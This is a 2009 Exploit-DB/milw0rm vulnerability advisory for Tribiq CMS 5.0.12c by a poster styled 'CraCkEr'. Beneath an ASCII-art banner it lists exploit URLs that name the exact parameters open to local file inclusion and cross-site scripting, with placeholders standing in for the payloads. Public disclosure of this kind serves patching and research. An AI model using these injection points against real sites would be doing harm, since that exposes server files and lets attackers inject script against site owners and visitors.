Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion

EDB-ID:

9012


Author:

CraCkEr

Type:

webapps


Platform:

PHP

Date:

2009-06-24


????????????????????????????????????????????????????????????????????????????????????
??                                C r a C k E r                                   ??
??             T H E   C R A C K   O F   E T E R N A L   M I G H T                ??
????????????????????????????????????????????????????????????????????????????????????

 ?????         From The Ashes and Dust Rises An Unimaginable crack....         ?????
????????????????????????????????????????????????????????????????????????????????????
??     [ Local File Include ]                                         [ XSS ]     ??
????????????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                   : :                                       :
?   Script   : Tribiq CMS 5.0.12c        ? ?          Register Globals :           ?
?   Download : sourceforge.net           ? ?                                       ?
?   Method   : GET                       ? ?           [ ] ON   [?] OFF            ?
?   Critical : High [????????]           ? ?                                       ?
?   Impact   : system information        ? ?                                       ?
? ???????????????????????????????????????? ??????????????????????????????????????? ?
?                                 DALnet #crackers                                ??
????????????????????????????????????????????????????????????????????????????????????
:                                                                                  :
?  Release Notes:                                                                  ?
?  ?????????????                                                                   ?
?  Typically used for remotely exploitable vulnerabilities that can lead to        ?
?  system compromise.                                                              ?
?                                                                                  ?

????????????????????????????????????????????????????????????????????????????????????
??                                Exploit URL's                                   ??
????????????????????????????????????????????????????????????????????????????????????


[LFI]

http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/masthead.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php?use_template_family=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/toppanel.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?template_path=[LFI]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=[LFI]


[XSS]

http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/nlarlist_content.inc.php?use_template_family=[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?errordisplay=[XSS]
http://localhost/path/templates/mytribiqsite/tribiq-CL-9000/includes/contact.inc.php?errormessage=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[title]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[threadlastpost]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[replies]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[threads]=[XSS]
http://localhost/path/templates/mytribiqsite/tribal-GPL-1066/includes/forum.inc.php?forum_summary[description]=[XSS]
http://localhost/path/tb/common/tb_foot.inc.php?tbFootNonStandardFooter=[XSS]

   
????????????????????????????????????????????????????????????????????????????????????
 
Greets:
       rd0, The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL .

????????????????????????????????????????????????????????????????????????????????????
??                                 © CraCkEr 2009                                 ??
????????????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2009-06-24]